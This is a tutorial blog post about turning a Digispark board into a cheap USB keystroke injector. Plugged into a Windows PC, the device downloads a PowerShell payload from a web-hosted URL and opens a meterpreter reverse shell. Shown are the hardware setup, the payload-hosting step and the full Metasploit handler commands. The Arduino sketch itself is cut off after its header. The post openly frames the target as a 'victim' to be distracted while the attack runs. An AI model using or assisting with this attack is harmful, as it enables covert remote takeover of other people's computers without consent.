Reverse Shell for 1,50€ – Digispark instead of USB Rubber Ducky

Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it. The only problem is the high (but reasonable) price of $45. In this tutorial I will show you how you can use the Digispark USB Deveoplment Board as a cheap alternative. As an example we will be creating a reverse shell, that will be launched when you plug the Digispark into a windows PC.

You will need:

Digispark USB Development Board

The Digispark from Digistump is a tiny, programmable micro-controller that can be programmed with the Arduino-IDE. The syntax is very similar to the one of Arduino-Boards. A tutorial on how to set the IDE up for the Digispark can be found here: Connecting and Programming Your Digispark

For a nice video to set the Digispark up, check out this tutorial by Seytonic(Thanks to xxByte for sharing).

Digispark USB Development Board

I bought a bunch of Digisparks of eBay for little money. They aren’t original (you can tell from the “rev3” which was never released) but they still are fully functional and perfect for our purposes.

Creating the Payload

First of all we need to create the payload that will be deployed and executed by the Digispark on our target machine. We will use MSFvenom for this.

You need to replace the LHOST parameter with you IP address. You also could use your domain and use the reverse shell even outside of your network.

Now… here we find the first difficulty. Unlike the Rubber Ducky which can use a SD-card of any size, the Digispark only has 6kb of internal memory and the library we are going to need to use the Digispark as a Keyboard itself has about 2,4kb. So there is no space to place the payload directly on it.
To get our payload on the victim-PC we need to make it accessible on the web. We could use a local web-server, upload the plain payload to pastebin or just place it on our webspace nox-sec.de/hacking/payload.html

Programming The Digispark

After we’ve created the Payload we can start with programming the Digispark! Here we have to keep in mind that to program the Digispark you have to work with a US-Keyboard-Layout, this means you have to account for special characters and such if your keyboard layout is one of foreign origin.

The Sourcecode for the Digispark:

Code for US keyboards

Arduino

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

#include "DigiKeyboard.h"

/* US-KEYBOARD-LAYOUT ONLY!!

*

* still needs some testing... but should work

*

* Made by _N0x

* Thanks to Alex (http://0xdeadcode.se/archives/581) for the idea of using a small powershell payload.

In principle you can leave the script unchanged and only change the URL for the Payload, so that the Payload you chose can be downloaded. The Digispark should now be ready for use! Before you storm out and try to plug it into the next best USB-Port though, you should prepare Kali Linux so that your Reverse-Shell Session can be accessed directly and as soon as needed.

Preparing MSFconsole

To prepare the receiving-end for the Reverse-Shell, open a Terminal on your Kali Linux system and start MSFconsole by entering

Shell

1

root@kali:~# msfconsole

Then specify what exploit you want to use:

Shell

1

msf>useexploit/multi/handler

Now there are still some parameters we have to determine:

Shell

1

2

3

4

5

6

msf exploit(handler)>set payload windows/meterpreter/reverse_tcp

payload=>windows/meterpreter/reverse_tcp

msf exploit(handler)>set LHOST10.0.0.10

LHOST=>10.0.0.10

msf exploit(handler)>set LPORT4444

LPORT=>4444

Replace the vlaue of LHOST with the IP/Domain you used when creating the payload with MSFconsole

To finish things off we have to tell our Console that it has to wait for a new session:

Shell

1

2

3

4

5

msf exploit(handler)>exploit-z-j

[*]Exploit running asbackground job.

[*]Started reverse TCP handler on10.0.0.10:4444

[*]Starting the payload handler...

Now it’s done! You can search for the next best PC to test your Digispark out! After you plug your Digispark in a Powershell will be opened and then closed, within this timeframe you have to distract your victim, after your USB Dev. Board starts to blink fastly you know your script has been executed and you can unplug the Digispark. If everything went how it should’ve your console should display this: